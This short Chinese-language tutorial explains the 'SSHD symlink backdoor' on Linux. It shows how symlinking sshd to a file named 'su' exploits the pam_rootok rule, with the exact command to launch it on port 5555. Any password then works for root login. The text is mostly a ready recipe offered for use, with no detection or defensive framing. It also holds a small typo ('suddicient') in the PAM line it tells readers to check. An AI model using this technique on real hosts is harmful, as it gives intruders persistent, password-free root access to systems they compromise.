SSHD软连接后门

软连接后门是sshd启用PAM认证的前提下，利用了一个PAM配置文件

将sshd文件生成软连接，把名称设置为su，应用在启动中会去和PAM配置文件夹中寻找是否存在对应名称的配置信息（su）
只要pam_rootok模块检测uid是0即可认证成功，这样就导致了可以使用任意密码登录
开启PAM认证机制在/etc/ssh/sshd_config文件中，设置UsePAM为yes

查看/etc/pam.d/su文件存在auth  suddicient  pam_rootok.so就能创建软连接

cat /etc/pam.d/su | grep "auth"

利用ln命令建立一个sshd软连接后门，并开启一个端口

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

查看开启的服务

连接然后可以ssh直接连接IP:端口，用户为root，密码任意输入即可